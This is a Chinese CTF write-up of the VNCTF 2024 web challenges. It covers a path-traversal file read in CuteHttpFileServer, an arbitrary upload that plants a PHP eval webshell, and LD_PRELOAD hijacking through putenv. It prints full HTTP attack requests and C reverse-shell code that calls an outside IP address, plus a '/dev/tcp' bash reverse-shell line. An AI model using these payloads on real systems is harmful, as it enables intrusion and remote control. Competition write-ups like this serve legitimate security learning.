2024 VNCTF web题目记录
Web
Checkin
在game.js中有
image-20240226140955103
复制去控制台执行一下
image-20240226141042639
CutePath
在这里https://github.com/ods-im/CuteHttpFileServer/issues/15有一个路径穿越的bug
image-20240226141814531
经过读取文件路径能发现flag路径在/flag/flag/falg.txt
在web服务的根目录/home/ming有一串base64
image-20240226142037601
解码得到:admin:gdgm.edu.cn@M1n9K1n9P@as
使用这个登录后直接改名flag.txt为../../../../../../home/ming/share_main/flag.txt把flag文件移动到可读的目录就能直接读取了
image-20240226142952052
还有一个就是在下载文件时有两个路由,一个是/chfs/shared/文件名和/chfs/downloaddir/文件夹名.zip
/chfs/shared路由不能下载,但是/chfs/downloaddir/能通过/chfs/downloaddir/../../../../../flag.zip下载
GET /chfs/downloaddir/../../../../../flag.zip HTTP/1.1
Host: manqiu.top:21544
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://manqiu.top:21544/
Cookie: JWT=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhY2MiOiJhZG1pbiIsImV4cCI6MTcwODkzMDUxOH0.fHTIWk7rP-yogOJinbKYaQMnApwATQNVSothHWo-vW8; user=admin
Upgrade-Insecure-Requests: 1
|
image-20240226144137766
直接在bp中保存为文件就能读取
TrySent
在https://blog.hanayuzu.top/articles/37dacab4.html在这里有一个任意文件上传的漏洞
image-20240226144437667
image-20240226144505583
经过测试确实存在漏洞,直接打
POST /admin/upload/upload HTTP/1.1
Host: f3985117-35e4-40a0-a9a6-1865e627b838.vnctf2024.manqiu.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------16835888751050935551489390355
Content-Length: 871
Origin: http://f3985117-35e4-40a0-a9a6-1865e627b838.vnctf2024.manqiu.top
Connection: close
Referer: http://f3985117-35e4-40a0-a9a6-1865e627b838.vnctf2024.manqiu.top/user/upload/index?name=icon&type=image&limit=1
Cookie: PHPSESSID=b85181cac3e5b6705609b75d9e806502
Content-Disposition: form-data; name="id"
WU_FILE_0
Content-Disposition: form-data; name="name"
shell.php.png
Content-Disposition: form-data; name="type"
image/png
Content-Disposition: form-data; name="lastModifiedDate"
2024/2/26 14:57:04
Content-Disposition: form-data; name="size"
5007
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: image/png
<?php
@eval($_POST['hack']);
phpinfo();
?>
|
image-20240226150557161
image-20240226150706972
givenphp
<?php
highlight_file(__FILE__);
if(isset($_POST['upload'])){
handleFileUpload($_FILES['file']);
}
if(isset($_GET['challenge'])){
waf();
$value=$_GET['value'];
$key=$_GET['key'];
$func=create_function("","putenv('$key=$value');");
if($func==$_GET['guess']){
$func();
system("whoami");
}
}
function waf()
{
if(preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['key'])||preg_match('/\'|"|%|\(|\)|;|bash/i',$_GET['value'])){
die("evil input!!!");
}
}
function handleFileUpload($file)
{
$uploadDirectory = '/tmp/';
if ($file['error'] !== UPLOAD_ERR_OK) {
echo '文件上传失败。';
return;
}
$fileExtension = pathinfo($file['name'], PATHINFO_EXTENSION);
$newFileName = uniqid('uploaded_file_', true) . '.' . $fileExtension;
$destination = $uploadDirectory . $newFileName;
if (move_uploaded_file($file['tmp_name'], $destination)) {
echo $destination;
} else {
echo '文件移动失败。';
}
}
|
很明显是环境变量主入,首先上传一个文件然后通过putenv()来设置环境变量
因为有system("whoami"),所以我们可以劫持whoami,那么就可以有两种做法,第一个是劫持whoami中的函数,第二个就是直接劫持
先看简单的直接劫持,使用__attribute__((constructor))在执行main函数之前就执行,直接反弹shell
#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>
char *server_ip="120.76.194.25";
uint32_t server_port=2323;
static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void)
{
int sock = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in attacker_addr = {0};
attacker_addr.sin_family = AF_INET;
attacker_addr.sin_port = htons(server_port);
attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
exit(0);
dup2(sock, 0);
dup2(sock, 1);
dup2(sock, 2);
execve("/bin/bash", 0, 0);
}
|
gcc -shared -fPIC exp.c -o exp.so
|
然后上传,注意还要POST一个upload参数,会返回文件路径
POST /index.php HTTP/1.1
Host: 4f46abdd-a34d-4278-bc42-e08d43419f04.vnctf2024.manqiu.top
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4126376237860086039755799043
Content-Length: 16893
Origin: http://4f46abdd-a34d-4278-bc42-e08d43419f04.vnctf2024.manqiu.top
Connection: close
Referer: http://4f46abdd-a34d-4278-bc42-e08d43419f04.vnctf2024.manqiu.top/
Upgrade-Insecure-Requests: 1
Content-Disposition: form-data; name="upload"
1
Content-Disposition: form-data; name="file"; filename="exp1.so"
Content-Type: application/octet-stream
exp elf
|
然后GET参数,这里要传一个guess参数,我们本地var_dump(urlencode())一个create_function()看看
image-20240226161918659
所以最后传参
?challenge=1&guess=%00lambda_1&key=LD_PRELOAD&value=/tmp/uploaded_file_65dc46245e4b82.77872209.so
|
shell就弹过来了
image-20240226160924329
另一个是劫持函数,readelf -Ws /usr/bin/whoami,看一下相关调用,这里选择strlen(),去查一下函数原型
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void payload() {
system("bash -c 'bash -i >& /dev/tcp/vpsip 0>&1'");
}
size_t strlen(const char *str){
if (getenv("LD_PRELOAD") == NULL) {
return 0;
}
unsetenv("LD_PRELOAD");
payload();
}
|
然后像上面一样编译,上传,传参,但是打了好多次都成功,官方wp就说不需要unsetenv()。。